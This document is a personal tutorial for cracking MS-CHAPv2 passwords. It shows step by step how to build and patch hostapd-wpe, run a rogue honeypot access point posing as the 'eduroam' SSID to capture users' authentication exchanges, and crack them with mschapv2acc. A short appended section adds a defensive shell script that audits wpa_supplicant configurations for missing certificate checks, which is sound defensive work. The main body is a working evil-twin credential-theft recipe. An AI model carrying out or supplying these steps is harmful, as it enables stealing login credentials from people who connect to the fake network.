#################################################
# My little tutorial to crack passwords for MS-CHAPv2
#################################################

# Compiling and patching hostapd

# Download all needed things
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz

# Extract
tar -zxf hostapd-2.2.tar.gz
cd hostapd-2.2

# Patch hostapd-wpe
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch
cd hostapd/

# If running on an x86_64 OS you have to enable crosscompile:
# open .config and uncomment the line CONFIG_LIBNL32=y
nano .config

# Then compile
make

# Install
#sudo make install

# Set up certs
cd ../../hostapd-wpe/certs
sudo ./bootstrap

# Then just in directory where you want to have hostapd-wpe.conf created
cd ../../hostapd-2.2/hostapd/
sudo ./hostapd-wpe hostapd-wpe.conf

# You will need to configure the hostapd-wpe.conf
nano hostapd-wpe.conf

# change interface to wifi
interface=wlp8s0mon
# because wifi
driver=nl80211
ssid=eduroam
# for WPA2
wpa=2
wpa_pairwise=CCMP

# Don't forget to switch to monitor mode

# Start hostapd-wpe and create a honeypot
sudo ./hostapd-wpe hostapd-wpe.conf

# Copy the username, challenge and the response for later.

###########################
# Setting up and running mschapv2acc
###########################

# Downloading and building
cd ../../
git clone https://github.com/polkaned/mschapv2acc.git
cd mschapv2acc
make

# Converting data captured with hostapd-wpe
# wpe2acc creates the authfile; you'll enter the username, challenge and response.
./wpe2acc
./mschapv2acc

# Using mschapv2acc to crack the pass
./mschapv2acc -w

Usage: mschapv2acc [Option] file_auth_in
Option
  -x            Enable cryptanalyse mode
  -r number     Specify the number maximal of characters, default is 12 (works only with brute force mode)
  -s            Enable MD4 with SSE2 (works only with brute force mode)
  -i            Enter password on standard input, disable brute force mode
  -w            Specify a dictionary file, disable brute force mode
  -V            Verbose mode, output each try (so slow)
Example: ./mschapv2acc -x -s file_auth
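
# A client sends its MS-CHAPv2 response to the honeypot above only if it accepts the honeypot's server certificate.
# Added example (not part of the original notes, nor code from hostapd-wpe or wpa_supplicant): a check that flags wpa_supplicant.conf network blocks lacking ca_cert or a server name match. The function names, sample configuration, identities and paths are constructed.

```sh
#!/bin/sh
# Added example, not part of the original notes: flag wpa_supplicant network
# blocks that would hand an MS-CHAPv2 exchange to any access point using the SSID.

# audit_eap_conf [FILE...]: print "ssid<TAB>finding" per risky 802.1X block.
audit_eap_conf() {
    awk '
    /^[ \t]*network=\{/ { inblk = 1; ssid = "?"; eap = ca = name = 0; next }
    inblk && /^[ \t]*\}/ {
        if (eap && !ca)        print ssid "\tno ca_cert: any server certificate is accepted"
        else if (eap && !name) print ssid "\tca_cert set, but no server name match"
        inblk = 0; next
    }
    inblk {
        line = $0; sub(/^[ \t]+/, "", line)
        if (line ~ /^ssid=/)    { ssid = line; sub(/^ssid=/, "", ssid); gsub(/"/, "", ssid) }
        if (line ~ /^key_mgmt=.*(WPA-EAP|IEEE8021X)/) eap = 1
        if (line ~ /^ca_cert=/) ca = 1
        if (line ~ /^(domain_suffix_match|domain_match|altsubject_match|subject_match)=/) name = 1
    }' "$@"
}

# Constructed sample configuration (hypothetical identities and paths).
sample_conf() {
    cat <<'EOF'
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.org"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="eduroam-ca-only"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/example-ca.pem"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="eduroam-pinned"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/example-ca.pem"
    domain_suffix_match="radius.example.org"
    phase2="auth=MSCHAPV2"
}
EOF
}

sample_conf | audit_eap_conf
```

# Pass one or more real configuration files as arguments (audit_eap_conf /etc/wpa_supplicant/wpa_supplicant.conf) instead of piping the sample.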